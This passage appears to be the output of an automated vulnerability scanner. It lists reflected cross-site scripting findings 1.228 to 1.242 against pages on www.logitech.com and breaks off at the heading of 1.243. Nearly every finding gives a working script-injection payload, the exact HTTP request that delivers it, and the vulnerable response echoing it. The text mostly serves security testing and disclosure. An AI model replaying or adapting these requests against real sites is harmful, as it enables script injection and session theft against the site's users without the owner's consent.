HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','434/7288e846e</script><script>alert(1)</script>9bd3403eac2' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.228. http://www.logitech.com/en-us/434/7288 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4e3"><script>alert(1)</script>75e334bcc3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/434/72881b4e3"><script>alert(1)</script>75e334bcc3a HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="434/72881b4e3"><script>alert(1)</script>75e334bcc3a">
...[SNIP]...

1.229. http://www.logitech.com/en-us/434/7454 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ff0"><script>alert(1)</script>7ce4cc8abb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us93ff0"><script>alert(1)</script>7ce4cc8abb6/434/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us93ff0"><script>alert(1)</script>7ce4cc8abb6/434/7454">
...[SNIP]...

1.230. http://www.logitech.com/en-us/434/7454 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2423"%3b72cc3b99502 was submitted in the REST URL parameter 1. This input was echoed as d2423";72cc3b99502 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usd2423"%3b72cc3b99502/434/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Set-Cookie: P_SEARCH_TEXT=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:32 GMT;path=/
Set-Cookie: LT_PRODUCT_ID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:32 GMT;path=/
Set-Cookie: CRID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:32 GMT;path=/
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usd2423";72cc3b99502/434/7454";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.231. http://www.logitech.com/en-us/434/7454 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b86a</script><script>alert(1)</script>8eeb9ae98b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4b86a</script><script>alert(1)</script>8eeb9ae98b7/434/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','4b86a</script><script>alert(1)</script>8eeb9ae98b7/434/7454' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.232. http://www.logitech.com/en-us/434/7454 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e89</script><script>alert(1)</script>88b82d92bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/434d2e89</script><script>alert(1)</script>88b82d92bac/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','434d2e89</script><script>alert(1)</script>88b82d92bac/7454' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.233. http://www.logitech.com/en-us/434/7454 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5984"><script>alert(1)</script>91ed86067f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/434f5984"><script>alert(1)</script>91ed86067f9/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="434f5984"><script>alert(1)</script>91ed86067f9/7454">
...[SNIP]...

1.234. http://www.logitech.com/en-us/434/7454 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72fc"><script>alert(1)</script>af62991ab8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/434/7454d72fc"><script>alert(1)</script>af62991ab8d HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="434/7454d72fc"><script>alert(1)</script>af62991ab8d">
...[SNIP]...

1.235. http://www.logitech.com/en-us/434/7454 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 744bf</script><script>alert(1)</script>855df44c795 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/434/7454744bf</script><script>alert(1)</script>855df44c795 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','434/7454744bf</script><script>alert(1)</script>855df44c795' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.236. http://www.logitech.com/en-us/437/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77462</script><script>alert(1)</script>5202e63abe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /77462</script><script>alert(1)</script>5202e63abe1/437/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','77462</script><script>alert(1)</script>5202e63abe1/437' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.237. http://www.logitech.com/en-us/437/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6932a"%3bc4c06e688d0 was submitted in the REST URL parameter 1. This input was echoed as 6932a";c4c06e688d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us6932a"%3bc4c06e688d0/437/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Apache
AK-control: no-store
Date: Fri, 12 Nov 2010 13:01:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us6932a";c4c06e688d0/437";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.238. http://www.logitech.com/en-us/437/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b70"><script>alert(1)</script>e328f9e7a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us47b70"><script>alert(1)</script>e328f9e7a0f/437/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us47b70"><script>alert(1)</script>e328f9e7a0f/437">
...[SNIP]...

1.239. http://www.logitech.com/en-us/437/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6f"><script>alert(1)</script>a23e194a9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/437c6a6f"><script>alert(1)</script>a23e194a9bd/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="437c6a6f"><script>alert(1)</script>a23e194a9bd">
...[SNIP]...

1.240. http://www.logitech.com/en-us/437/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47db6</script><script>alert(1)</script>c4103c39890 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/43747db6</script><script>alert(1)</script>c4103c39890/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','43747db6</script><script>alert(1)</script>c4103c39890' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.241. http://www.logitech.com/en-us/437/221 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/221

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac55e"><script>alert(1)</script>865702b8f76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usac55e"><script>alert(1)</script>865702b8f76/437/221 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usac55e"><script>alert(1)</script>865702b8f76/437/221">
...[SNIP]...

1.242. http://www.logitech.com/en-us/437/221 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/437/221

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4813d"%3b172b7a2f7e3 was submitted in the REST URL parameter 1. This input was echoed as 4813d";172b7a2f7e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us4813d"%3b172b7a2f7e3/437/221 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Set-Cookie: P_SEARCH_TEXT=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:01:47 GMT;path=/
Set-Cookie: LT_PRODUCT_ID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:01:47 GMT;path=/
Set-Cookie: CRID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:01:47 GMT;path=/
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us4813d";172b7a2f7e3/437/221";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.243. http://www.logitech.com/en-us/437/221 [REST URL parameter 1]